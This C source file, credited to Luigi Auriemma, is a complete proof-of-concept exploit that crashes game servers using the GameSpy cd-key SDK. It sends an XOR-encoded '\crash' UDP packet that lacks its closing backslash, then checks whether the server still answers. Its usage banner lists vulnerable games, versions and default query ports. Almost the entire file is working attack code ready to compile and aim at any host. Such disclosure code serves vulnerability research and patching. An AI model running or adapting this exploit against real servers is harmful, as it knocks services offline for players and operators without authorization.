/*

by Luigi Auriemma

UNIX & WIN VERSION
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netdb.h>
#endif





#define VER     "0.1"
#define BUFFSZ  2048
#define TIMEOUT 5





void gamespyxor(u_char *string, int len);
void gs_info_udp(u_long ip, u_short port);
int timeout(int sock);
u_long resolv(char *host);
void std_err(void);






int main(int argc, char *argv[]) {
    int         sd,
                err;
    u_short     port;
    u_char      pck[] = "\\crash\0";
                /* the bug is caused by the absence of  */
                /* the final backslash (as \crash\)     */
                /* the final NULL is useless but I want */
                /* to be sure at 100%                   */
    struct  sockaddr_in peer;


    setbuf(stdout, NULL);

    fputs("\n"
        "Gamespy hidden cd-key SDK: remote server crash "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@altervista.org\n"
        "web:    http://aluigi.altervista.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Vulnerable games                 Latest bugged versions  Default query ports\n"
            "----------------------------------------------------------------------------\n"
            "  Battlefield 1942               1.6.19, 1.6rc1          23000, 22000 (LAN)\n"
            "  Contract Jack                  1.1                     27888\n"
            "  Gore                           1.48 (1.49)             27778\n"
            "  Halo                           1.031                   2302\n"
            "  Hidden & Dangerous 2           1.04                    11004\n"
            "  IGI 2: Covert Strike           1.3                     26001\n"
            "  Judge Dredd: Dredd vs. Death   1.01                    25858\n"
            "  Need For Speed Hot Pursuit 2   242                     61220\n"
            "  TRON2.0                        1.042                   27888\n"
            "  ...possibly others...\n"
            "\n"
            "Usage: %s <server> <port>\n"
            "\n", argv[0]);
        exit(1);
    }

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    port                 = atoi(argv[2]);
    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("\nContacting %s:%hu\n",
        inet_ntoa(peer.sin_addr), port);

    gs_info_udp(peer.sin_addr.s_addr, port);

        /* boom */
    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();
    gamespyxor(pck, sizeof(pck) - 1);
    err = sendto(sd, pck, sizeof(pck) - 1, 0, (struct sockaddr *)&peer, sizeof(peer));
    if(err < 0) std_err();
    close(sd);

    fputs("\nMalicious packet has been sent, Now I check if the server is crashed:\n", stdout);

        /* check */
    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();
    err = sendto(sd, "\\status\\", 8, 0, (struct sockaddr *)&peer, sizeof(peer));
    if(err < 0) std_err();
    if(timeout(sd) < 0) {
        fputs("\nServer IS vulnerable!!!\n\n", stdout);
    } else {
        fputs("\nServer doesn't seem to be vulnerable\n\n", stdout);
    }

    close(sd);
    return(0);
}






void gamespyxor(u_char *string, int len) {
    u_char  gamespy[] = "gamespy",
            *gs;
    for(gs = gamespy; len; len--, gs++, string++) {
        if(!*gs) gs = gamespy;
        *string ^= *gs;
    }
}






void gs_info_udp(u_long ip, u_short port) {
    struct  sockaddr_in peer;
    int     sd,
            err,
            plen,
            nt = 1;
    u_char  buff[2048],
            *p1,
            *p2;

    peer.sin_addr.s_addr = ip;
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;
    plen                 = sizeof(peer);

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    err = sendto(sd, "\\status\\", 8, 0, (struct sockaddr *)&peer, plen);
    if(err < 0) std_err();

    if(timeout(sd) < 0) {
        fputs("\nError: socket timeout, I exit\n", stdout);
        exit(1);
    }

    err = recvfrom(sd, buff, sizeof(buff) - 1, 0, (struct sockaddr *)&peer, &plen);
    if(err < 0) std_err();

    buff[err] = 0x00;
    p1 = buff;
    while(1) {
        p2 = strchr(p1, '\\');
        if(!p2) break;
        *p2 = 0x00;

        if(!nt) {
            printf("%30s: ", p1);
            nt++;
        } else {
            printf("%s\n", p1);
            nt = 0;
        }
        p1 = p2 + 1;
    }
    printf("%s\n\n", p1);
    close(sd);
}






int timeout(int sock) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec = TIMEOUT;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}





u_long resolv(char *host) {
    struct hostent *hp;
    u_long host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_long *)hp->h_addr;
    }
    return(host_ip);
}





#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif



